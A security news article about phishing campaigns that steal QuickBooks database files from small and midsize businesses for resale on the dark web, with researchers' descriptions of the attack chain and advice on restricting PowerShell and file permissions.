Cybercriminals Target QuickBooks Databases

Stolen financial files then get sold on the Dark Web, researchers say.

Cybercriminals increasingly have targeted QuickBooks file data at small and midsize businesses (SMBs) over the past few months, according to new research.
The breaches start with two types of phishing attacks to gain access to QuickBooks databases, according to findings by ThreatLocker. In the first, the attackers send a PowerShell command that runs inside the malicious email. In the second, the attackers send a Word document via email; if the recipient opens the attached document, a macro or link within that document downloads a file onto their machine. Once the executable or PowerShell command runs, it retrieves the victims most recently saved QuickBooks file location, points to the file share or local file, and grabs that file.
Danny Jenkins, co-founder and CEO of ThreatLocker, says the attackers usually upload the stolen files to either Google Cloud or Amazon Web Services as a temporary transfer point. From there, they sell the data on the Dark Web, where other cybercriminals buy the data to launch more targeted attacks on other QuickBooks databases or on the customers and suppliers of the victim organizations.
They will attack every angle possible, Jenkins adds. Cybercriminals can easily buy these QuickBook databases on the Dark Web and launch attacks.
Meantime, some 43% of organizations of all sizes say theyve been victims of a spear-phishing attack in the past 12 months, according to
data
from Barracuda Networks, and only 23% say they have dedicated spear-phishing protection in place.
Most of the emails are invoices and resumes, ThreatLockers Jenkins explains of the lures. We dont have exact numbers, but we do know that millions of dollars in cybercrime is caused by these types of attacks.
Accounting programs are often written without taking security into consideration, Jenkins notes, and QuickBooks has a fundamental flaw: When an administrator runs a repair on the QuickBooks database after a system crash, all the file-share permissions can be reset, leaving the database accessible by everyone in the company. This means if hackers get into the system after a repair, they have access to all permissions — including the companys accountant or business manager.
People wonder how the hackers have access to all their customer accounts, but its really quite simple: Once they have access to the QuickBooks database, they have access to all your customers, Jenkins says. What were telling SMBs is to restrict permissions by user and by application. Theres no reason for Microsoft Office or PowerShell to have access to QuickBooks.
ThreatLocker detailed its research in a
blog
post today.
Dirk Schrader, global vice president, security research at New Net Technologies, says the QuickBooks attacks are notable for their simplicity. The attackers are only using a few lines of PowerShell script and exploiting design weaknesses in a QuickBooks software application that’s often used by smaller companies, many of which lack the expertise and staffing to stay up-to-par with cybersecurity issues.
Schrader says SMBs should control whether PowerShell scripts can be executed with the current users rights and permissions. While that might be overwhelming for some small organizations, they can instead look to secure configuration management and change control to detect the malicious file drops.
Unfortunately, SMBs have to make a very first step, which is to acknowledge that a cyberattack will happen to them and that they are not too small to be of interest, Schrader says.

The interest the hackers have is to get the SMBs information about their customers [and then] work up to the larger corporate targets — be they customers or suppliers of the SMB.

Last News
▸ ArcSight prepares for future at user conference post HP acquisition. ◂ Discovered: 07/01/2025 Category: security	▸ Samsung Epic 4G: First To Use Media Hub ◂ Discovered: 07/01/2025 Category: security	▸ Many third-party software fails security tests ◂ Discovered: 07/01/2025 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
Cybercriminals Target QuickBooks Databases